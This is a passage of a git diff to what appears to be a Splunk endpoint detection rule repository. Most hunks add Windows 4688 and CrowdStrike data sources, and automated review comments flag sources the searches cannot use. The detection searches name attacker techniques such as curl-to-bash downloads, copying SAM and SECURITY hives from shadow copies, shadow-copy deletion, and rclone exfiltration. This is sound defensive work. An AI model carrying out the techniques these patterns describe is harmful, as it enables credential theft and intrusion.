The following analytic detects the creation of shadow copies using "wmic" or "Powershell" commands. It leverages the Endpoint.Processes data model in Splunk to identify processes where the command includes "shadowcopy" and "create". This activity is significant because it may indicate an attacker attempting to manipulate or access data unauthorizedly, potentially leading to data theft or manipulation. If confirmed malicious, this behavior could allow attackers to backup and exfiltrate sensitive data or hide their tracks by restoring files to a previous state after an attack.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_wmic` OR `process_powershell`
Processes.process=*shadowcopy* Processes.process=*create* by Processes.user Processes.process_name
diff --git a/detections/endpoint/credential_dumping_via_copy_command_from_shadow_copy.yml b/detections/endpoint/credential_dumping_via_copy_command_from_shadow_copy.yml
index 6cf0509fb1..52246deb24 100644
--- a/detections/endpoint/credential_dumping_via_copy_command_from_shadow_copy.yml
+++ b/detections/endpoint/credential_dumping_via_copy_command_from_shadow_copy.yml
@@ -15,6 +15,8 @@ description: "The following analytic detects the use of the copy command to dump
the network, or accessing sensitive data."
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_cmd` (Processes.process=*\\system32\\config\\sam*
OR Processes.process=*\\system32\\config\\security* OR Processes.process=*\\system32\\config\\system*
diff --git a/detections/endpoint/credential_dumping_via_symlink_to_shadow_copy.yml b/detections/endpoint/credential_dumping_via_symlink_to_shadow_copy.yml
index dcc09e8198..dbb443f677 100644
--- a/detections/endpoint/credential_dumping_via_symlink_to_shadow_copy.yml
+++ b/detections/endpoint/credential_dumping_via_symlink_to_shadow_copy.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects the creation of a symlink to a shadow copy, which may indicate credential dumping attempts. It leverages the Endpoint.Processes data model in Splunk to identify processes executing commands containing "mklink" and "HarddiskVolumeShadowCopy". This activity is significant because attackers often use this technique to manipulate or delete shadow copies, hindering system backup and recovery efforts. If confirmed malicious, this could prevent data restoration, complicate incident response, and lead to data loss or compromise. Analysts should review the process details, user, parent process, and any related artifacts to identify the attack source.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*mklink*
Processes.process=*HarddiskVolumeShadowCopy* by Processes.dest Processes.user Processes.process_name
diff --git a/detections/endpoint/csc_net_on_the_fly_compilation.yml b/detections/endpoint/csc_net_on_the_fly_compilation.yml
index 4468e9810d..c768549ae9 100644
--- a/detections/endpoint/csc_net_on_the_fly_compilation.yml
+++ b/detections/endpoint/csc_net_on_the_fly_compilation.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of the .NET compiler csc.exe
movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_csc` Processes.process
= "*/noconfig*" Processes.process = "*/fullpaths*" Processes.process = "*@*" by
diff --git a/detections/endpoint/curl_download_and_bash_execution.yml b/detections/endpoint/curl_download_and_bash_execution.yml
index 0109178820..5f074c7b88 100644
--- a/detections/endpoint/curl_download_and_bash_execution.yml
+++ b/detections/endpoint/curl_download_and_bash_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of curl on Linux or MacOS sy
further exploitation within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl
(Processes.process="*-s *") OR (Processes.process="*|*" AND Processes.process="*bash*")
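Review bot: `Windows Event Log Security 4688` is added as a data source to a detection whose description (the hunk's context line) scopes it to curl on Linux or MacOS; a Windows Security event cannot produce that telemetry, so the entry advertises coverage the search cannot get from it. Either drop the `- Windows Event Log Security 4688` line or, if curl.exe on Windows is now in scope, say so in the description. `CrowdStrike ProcessRollup2` is plausible for Linux and macOS sensors and can stay, provided the Endpoint.Processes mapping for it exists in the deployment.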
diff --git a/detections/endpoint/deleting_of_net_users.yml b/detections/endpoint/deleting_of_net_users.yml
index 56b579762c..aa2aa52505 100644
--- a/detections/endpoint/deleting_of_net_users.yml
+++ b/detections/endpoint/deleting_of_net_users.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of net.exe or net1.exe comma
of adversarial actions, complicating incident response and forensic investigations.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.parent_process) as parent_process values(Processes.process_id)
as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/deleting_shadow_copies.yml b/detections/endpoint/deleting_shadow_copies.yml
index 8c80cef2f6..ef98a61925 100644
--- a/detections/endpoint/deleting_shadow_copies.yml
+++ b/detections/endpoint/deleting_shadow_copies.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the deletion of shadow copies using
promptly.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe
diff --git a/detections/endpoint/detect_azurehound_command_line_arguments.yml b/detections/endpoint/detect_azurehound_command_line_arguments.yml
index 878510f5e2..23fd528463 100644
--- a/detections/endpoint/detect_azurehound_command_line_arguments.yml
+++ b/detections/endpoint/detect_azurehound_command_line_arguments.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of the `Invoke-AzureHo
structures, aiding in further attacks and privilege escalation.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*invoke-azurehound*")
by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/detect_certify_command_line_arguments.yml b/detections/endpoint/detect_certify_command_line_arguments.yml
index 52dd482e6e..54c5cf2e88 100644
--- a/detections/endpoint/detect_certify_command_line_arguments.yml
+++ b/detections/endpoint/detect_certify_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Certify or Certipy tools
escalating their privileges within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("* find
*","* auth *","* request *","* req *","* download *",) AND Processes.process IN
diff --git a/detections/endpoint/detect_certipy_file_modifications.yml b/detections/endpoint/detect_certipy_file_modifications.yml
index ea93660b54..7b19537648 100644
--- a/detections/endpoint/detect_certipy_file_modifications.yml
+++ b/detections/endpoint/detect_certipy_file_modifications.yml
@@ -14,8 +14,7 @@ description: The following analytic detects the use of the Certipy tool to enume
malicious, this could lead to unauthorized access to sensitive AD CS information,
enabling further attacks or privilege escalation within the network.
data_source:
-- Windows Event Log Security 4663
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
AS lastTime values(Processes.process_current_directory) as process_current_directory
FROM datamodel=Endpoint.Processes where Processes.action="allowed" BY _time span=1h
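Review bot: The new single list item `Sysmon EventID 1 AND Sysmon EventID 11` folds two data sources into one value, breaking the one-source-per-item convention every other file in this change follows; if contentctl (bumped to 4.2.0 in this same commit) validates data_source entries against the data_sources definitions, this combined name must exist there or validation will fail. The same form is introduced in detect_exchange_web_shell and detect_outlook_exe_writing_a_zip_file. If the intent is to express that both sources are required, keep `- Sysmon EventID 1` and `- Sysmon EventID 11` as two items and state the requirement in how_to_implement, which lies outside this hunk.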
diff --git a/detections/endpoint/detect_computer_changed_with_anonymous_account.yml b/detections/endpoint/detect_computer_changed_with_anonymous_account.yml
index c0009a11d9..c0e053fe2b 100644
--- a/detections/endpoint/detect_computer_changed_with_anonymous_account.yml
+++ b/detections/endpoint/detect_computer_changed_with_anonymous_account.yml
@@ -13,7 +13,8 @@ description: The following analytic detects changes to computer accounts using a
If confirmed malicious, this could allow an attacker to alter computer accounts,
potentially leading to privilege escalation or persistent access within the network.
data_source:
-- Windows Event Log Security 4624
+- Windows Event Log Security 4624
+- Windows Event Log Security 4742
search: '`wineventlog_security` EventCode=4624 OR EventCode=4742 TargetUserName="ANONYMOUS
LOGON" LogonType=3 | stats count values(host) as host, values(TargetDomainName)
as Domain, values(user) as user | `detect_computer_changed_with_anonymous_account_filter`'
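Review bot: Adding `Windows Event Log Security 4742` matches the `EventCode=4624 OR EventCode=4742` clause, but the search also requires `LogonType=3`, and with Splunk's precedence (OR before implicit AND) that term applies to both event codes; 4742 computer-account-changed events do not, to my knowledge, carry a LogonType field, so they would be filtered out and the newly declared source would never contribute results. Worth confirming against sample 4742 events; if it holds, scope the filter as `(EventCode=4624 LogonType=3) OR EventCode=4742`. The `- Windows Event Log Security 4624` line that is removed and re-added appears to differ only in whitespace.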
diff --git a/detections/endpoint/detect_exchange_web_shell.yml b/detections/endpoint/detect_exchange_web_shell.yml
index da8c1f8422..940893d70b 100644
--- a/detections/endpoint/detect_exchange_web_shell.yml
+++ b/detections/endpoint/detect_exchange_web_shell.yml
@@ -14,8 +14,7 @@ description: 'The following analytic identifies the creation of suspicious .aspx
attackers could gain unauthorized access, execute arbitrary commands, and potentially
escalate privileges within the Exchange environment.'
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name
Processes.dest Processes.user | `drop_dm_object_name(Processes)` | join process_guid,
diff --git a/detections/endpoint/detect_html_help_renamed.yml b/detections/endpoint/detect_html_help_renamed.yml
index 60171a55be..96c1c6504d 100644
--- a/detections/endpoint/detect_html_help_renamed.yml
+++ b/detections/endpoint/detect_html_help_renamed.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances where hh.exe (HTML Help) h
posing a significant security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=hh.exe
AND Processes.original_file_name=HH.EXE by Processes.dest Processes.user Processes.parent_process_name
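Review bot: This search filters on `Processes.original_file_name=HH.EXE`, a value Windows Security 4688 does not provide (it comes from the PE version resource, which Sysmon records as OriginalFileName), so declaring `Windows Event Log Security 4688` here advertises coverage the search cannot deliver from that source. The same applies to detect_mshta_renamed, detect_renamed_7_zip, detect_renamed_psexec, detect_renamed_rclone and detect_renamed_winrar in this change, all of which filter on original_file_name. Whether CrowdStrike ProcessRollup2 populates that field through the Endpoint data model mapping should be checked before keeping that entry as well. Suggest removing the `- Windows Event Log Security 4688` line from these six files, or noting in how_to_implement (outside this hunk) that only sources supplying original_file_name will produce results.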
diff --git a/detections/endpoint/detect_html_help_spawn_child_process.yml b/detections/endpoint/detect_html_help_spawn_child_process.yml
index f0f773852e..0bf59fa7b4 100644
--- a/detections/endpoint/detect_html_help_spawn_child_process.yml
+++ b/detections/endpoint/detect_html_help_spawn_child_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of hh.exe (HTML Help)
the system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=hh.exe
by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/detect_html_help_url_in_command_line.yml b/detections/endpoint/detect_html_help_url_in_command_line.yml
index 4c4b6b1eb6..39e6d921f4 100644
--- a/detections/endpoint/detect_html_help_url_in_command_line.yml
+++ b/detections/endpoint/detect_html_help_url_in_command_line.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of hh.exe (HTML Help)
like JScript or VBScript, leading to further system compromise or data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process=*http*
by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process
diff --git a/detections/endpoint/detect_html_help_using_infotech_storage_handlers.yml b/detections/endpoint/detect_html_help_using_infotech_storage_handlers.yml
index 698a35211c..c12f5cc105 100644
--- a/detections/endpoint/detect_html_help_using_infotech_storage_handlers.yml
+++ b/detections/endpoint/detect_html_help_using_infotech_storage_handlers.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of hh.exe (HTML Help)
within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process
IN ("*its:*", "*mk:@MSITStore:*") by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/detect_mshta_inline_hta_execution.yml b/detections/endpoint/detect_mshta_inline_hta_execution.yml
index af7f3f9e8b..06028fdf06 100644
--- a/detections/endpoint/detect_mshta_inline_hta_execution.yml
+++ b/detections/endpoint/detect_mshta_inline_hta_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of "mshta.exe" with in
security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process=*vbscript*
diff --git a/detections/endpoint/detect_mshta_renamed.yml b/detections/endpoint/detect_mshta_renamed.yml
index b158d5c8be..e9ec5aeee1 100644
--- a/detections/endpoint/detect_mshta_renamed.yml
+++ b/detections/endpoint/detect_mshta_renamed.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where mshta.exe has bee
data exfiltration, or further lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=mshta.exe
AND Processes.original_file_name=MSHTA.EXE by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/detect_mshta_url_in_command_line.yml b/detections/endpoint/detect_mshta_url_in_command_line.yml
index 185cb9a885..3ae2c2e361 100644
--- a/detections/endpoint/detect_mshta_url_in_command_line.yml
+++ b/detections/endpoint/detect_mshta_url_in_command_line.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of Microsoft HTML Applicatio
leading to system compromise, data exfiltration, or further network infiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where `process_mshta` (Processes.process="*http://*"
diff --git a/detections/endpoint/detect_new_local_admin_account.yml b/detections/endpoint/detect_new_local_admin_account.yml
index f85f0831f8..3713d9963f 100644
--- a/detections/endpoint/detect_new_local_admin_account.yml
+++ b/detections/endpoint/detect_new_local_admin_account.yml
@@ -8,7 +8,7 @@ type: TTP
description: |-
The following analytic detects the creation of new accounts elevated to local administrators. It uses Windows event logs, specifically EventCode 4720 (user account creation) and EventCode 4732 (user added to Administrators group). This activity is significant as it indicates potential unauthorized privilege escalation, which is critical for SOC monitoring. If confirmed malicious, this could allow attackers to gain administrative access, leading to unauthorized data access, system modifications, and disruption of services. Immediate investigation is required to mitigate risks and prevent further unauthorized actions.
data_source:
-- Windows Event Log Security 4732
+- Windows Event Log Security 4732
- Windows Event Log Security 4720
search: '`wineventlog_security` EventCode=4720 OR (EventCode=4732 Group_Name=Administrators)
| transaction src_user connected=false maxspan=180m | rename src_user as user |
diff --git a/detections/endpoint/detect_outlook_exe_writing_a_zip_file.yml b/detections/endpoint/detect_outlook_exe_writing_a_zip_file.yml
index dc47120c0d..54570dfcff 100644
--- a/detections/endpoint/detect_outlook_exe_writing_a_zip_file.yml
+++ b/detections/endpoint/detect_outlook_exe_writing_a_zip_file.yml
@@ -13,8 +13,7 @@ description: The following analytic identifies the execution of `outlook.exe` wr
data access, data exfiltration, or the delivery of malware, potentially compromising
the security of the affected system and network.
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 11
+- Sysmon EventID 1 AND Sysmon EventID 11
search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes where Processes.process_name=outlook.exe
by _time span=5m Processes.parent_process_id Processes.process_id Processes.dest
diff --git a/detections/endpoint/detect_path_interception_by_creation_of_program_exe.yml b/detections/endpoint/detect_path_interception_by_creation_of_program_exe.yml
index 285f004d82..13e0540cab 100644
--- a/detections/endpoint/detect_path_interception_by_creation_of_program_exe.yml
+++ b/detections/endpoint/detect_path_interception_by_creation_of_program_exe.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the creation of a program execut
control over the affected endpoint.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=services.exe
by Processes.user Processes.process_name Processes.parent_process_name Processes.process
diff --git a/detections/endpoint/detect_processes_used_for_system_network_configuration_discovery.yml b/detections/endpoint/detect_processes_used_for_system_network_configuration_discovery.yml
index 349a349275..34ed7012f3 100644
--- a/detections/endpoint/detect_processes_used_for_system_network_configuration_discovery.yml
+++ b/detections/endpoint/detect_processes_used_for_system_network_configuration_discovery.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies the rapid execution of processes
system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where NOT Processes.user
diff --git a/detections/endpoint/detect_prohibited_applications_spawning_cmd_exe.yml b/detections/endpoint/detect_prohibited_applications_spawning_cmd_exe.yml
index 97d75ed7dd..42b3afa82c 100644
--- a/detections/endpoint/detect_prohibited_applications_spawning_cmd_exe.yml
+++ b/detections/endpoint/detect_prohibited_applications_spawning_cmd_exe.yml
@@ -15,6 +15,8 @@ description: The following analytic detects executions of cmd.exe spawned by pro
within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where `process_cmd` by Processes.parent_process_name Processes.process_name Processes.original_file_name
diff --git a/detections/endpoint/detect_psexec_with_accepteula_flag.yml b/detections/endpoint/detect_psexec_with_accepteula_flag.yml
index 3eeaf9e622..7425d35887 100644
--- a/detections/endpoint/detect_psexec_with_accepteula_flag.yml
+++ b/detections/endpoint/detect_psexec_with_accepteula_flag.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `PsExec.exe` wit
to further system compromise and lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where `process_psexec` Processes.process=*accepteula* by Processes.dest Processes.user
diff --git a/detections/endpoint/detect_rare_executables.yml b/detections/endpoint/detect_rare_executables.yml
index ea623d3505..f57cfa9c70 100644
--- a/detections/endpoint/detect_rare_executables.yml
+++ b/detections/endpoint/detect_rare_executables.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rare processes that
impact.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` dc(Processes.dest) as dc_dest values(Processes.dest)
as dest values(Processes.user) as user min(_time) as firstTime max(_time) as lastTime
from datamodel=Endpoint.Processes by Processes.process_name | `drop_dm_object_name(Processes)`
diff --git a/detections/endpoint/detect_rclone_command_line_usage.yml b/detections/endpoint/detect_rclone_command_line_usage.yml
index 29882711c6..4f19089aa9 100644
--- a/detections/endpoint/detect_rclone_command_line_usage.yml
+++ b/detections/endpoint/detect_rclone_command_line_usage.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the usage of `rclone.exe` with speci
the affected endpoint and further investigation are recommended.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rclone` Processes.process
IN ("*copy*", "*mega*", "*pcloud*", "*ftp*", "*--config*", "*--progress*", "*--no-check-certificate*",
diff --git a/detections/endpoint/detect_regasm_spawning_a_process.yml b/detections/endpoint/detect_regasm_spawning_a_process.yml
index 1bdfb85536..3c1cbc05e1 100644
--- a/detections/endpoint/detect_regasm_spawning_a_process.yml
+++ b/detections/endpoint/detect_regasm_spawning_a_process.yml
@@ -16,6 +16,8 @@ description: The following analytic detects regasm.exe spawning a child process.
activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regasm.exe
NOT (Processes.process_name IN ("conhost.exe")) by Processes.dest Processes.user
diff --git a/detections/endpoint/detect_regasm_with_no_command_line_arguments.yml b/detections/endpoint/detect_regasm_with_no_command_line_arguments.yml
index 7efb79d1c9..24689955db 100644
--- a/detections/endpoint/detect_regasm_with_no_command_line_arguments.yml
+++ b/detections/endpoint/detect_regasm_with_no_command_line_arguments.yml
@@ -16,6 +16,8 @@ description: The following analytic detects instances of regasm.exe running with
module loads for further context.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where `process_regasm` by _time span=1h Processes.process_id Processes.process_name
Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/detect_regsvcs_spawning_a_process.yml b/detections/endpoint/detect_regsvcs_spawning_a_process.yml
index 91fb7c7e28..646e697301 100644
--- a/detections/endpoint/detect_regsvcs_spawning_a_process.yml
+++ b/detections/endpoint/detect_regsvcs_spawning_a_process.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies regsvcs.exe spawning a child proc
suspicious activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regsvcs.exe
by Processes.parent_process_name Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/detect_regsvcs_with_no_command_line_arguments.yml b/detections/endpoint/detect_regsvcs_with_no_command_line_arguments.yml
index 47800ef07f..0a0fe2847a 100644
--- a/detections/endpoint/detect_regsvcs_with_no_command_line_arguments.yml
+++ b/detections/endpoint/detect_regsvcs_with_no_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances of regsvcs.exe running wit
sensitive information.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
where `process_regsvcs` by _time span=1h Processes.process_id Processes.process_name
Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/detect_regsvr32_application_control_bypass.yml b/detections/endpoint/detect_regsvr32_application_control_bypass.yml
index a93cf963e5..ccb6c34f83 100644
--- a/detections/endpoint/detect_regsvr32_application_control_bypass.yml
+++ b/detections/endpoint/detect_regsvr32_application_control_bypass.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the abuse of Regsvr32.exe to pro
code, potentially leading to system compromise and persistent access.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process=*scrobj*
by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/detect_remote_access_software_usage_fileinfo.yml b/detections/endpoint/detect_remote_access_software_usage_fileinfo.yml
index 6bda13e076..f1b0f83359 100644
--- a/detections/endpoint/detect_remote_access_software_usage_fileinfo.yml
+++ b/detections/endpoint/detect_remote_access_software_usage_fileinfo.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of processes with file
potentially leading to data exfiltration or further compromise of the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '`sysmon` EventCode=1 | stats count min(_time) as firstTime max(_time) as
lastTime, values(Company) as Company values(Product) as Product by dest, user, parent_process_name,
process_name, process | lookup remote_access_software remote_utility_fileinfo AS
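Review bot: The search here is a raw `` `sysmon` EventCode=1 `` query that also reads the Sysmon-specific `Company` and `Product` fields, so the two new entries `Windows Event Log Security 4688` and `CrowdStrike ProcessRollup2` can never feed it; unlike the other files in this change, this detection does not go through datamodel=Endpoint.Processes. Keep `- Sysmon EventID 1` as the only data source, or rewrite the search against the data model if broader coverage is intended (the remainder of the search is outside this hunk).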
diff --git a/detections/endpoint/detect_remote_access_software_usage_process.yml b/detections/endpoint/detect_remote_access_software_usage_process.yml
index af552ade69..36e51df67e 100644
--- a/detections/endpoint/detect_remote_access_software_usage_process.yml
+++ b/detections/endpoint/detect_remote_access_software_usage_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of known remote access
security.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime values(Processes.parent_process) as parent_process from datamodel=Endpoint.Processes
where Processes.dest!=unknown Processes.process!=unknown by Processes.dest Processes.user
diff --git a/detections/endpoint/detect_renamed_7_zip.yml b/detections/endpoint/detect_renamed_7_zip.yml
index abfe571860..4e2ebc0a7f 100644
--- a/detections/endpoint/detect_renamed_7_zip.yml
+++ b/detections/endpoint/detect_renamed_7_zip.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the usage of a renamed 7-Zip executa
activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.original_file_name=7z*.exe
AND Processes.process_name!=7z*.exe) by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/detect_renamed_psexec.yml b/detections/endpoint/detect_renamed_psexec.yml
index 1fdb7b4204..9d7d8bc7d4 100644
--- a/detections/endpoint/detect_renamed_psexec.yml
+++ b/detections/endpoint/detect_renamed_psexec.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where `PsExec.exe` has
of the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name!=psexec.exe
AND Processes.process_name!=psexec64.exe) AND Processes.original_file_name=psexec.c
diff --git a/detections/endpoint/detect_renamed_rclone.yml b/detections/endpoint/detect_renamed_rclone.yml
index 163caf9566..7f6f2869a7 100644
--- a/detections/endpoint/detect_renamed_rclone.yml
+++ b/detections/endpoint/detect_renamed_rclone.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of a renamed `rclone.e
leading to significant data loss and further compromise of the affected systems.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.original_file_name=rclone.exe
AND Processes.process_name!=rclone.exe) by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/detect_renamed_winrar.yml b/detections/endpoint/detect_renamed_winrar.yml
index 7a62f9c579..b5f4ed522a 100644
--- a/detections/endpoint/detect_renamed_winrar.yml
+++ b/detections/endpoint/detect_renamed_winrar.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where `WinRAR.exe` has
extraction or further system compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.original_file_name=WinRAR.exe
(Processes.process_name!=rar.exe OR Processes.process_name!=winrar.exe) by Processes.dest
diff --git a/detections/endpoint/detect_rtlo_in_process.yml b/detections/endpoint/detect_rtlo_in_process.yml
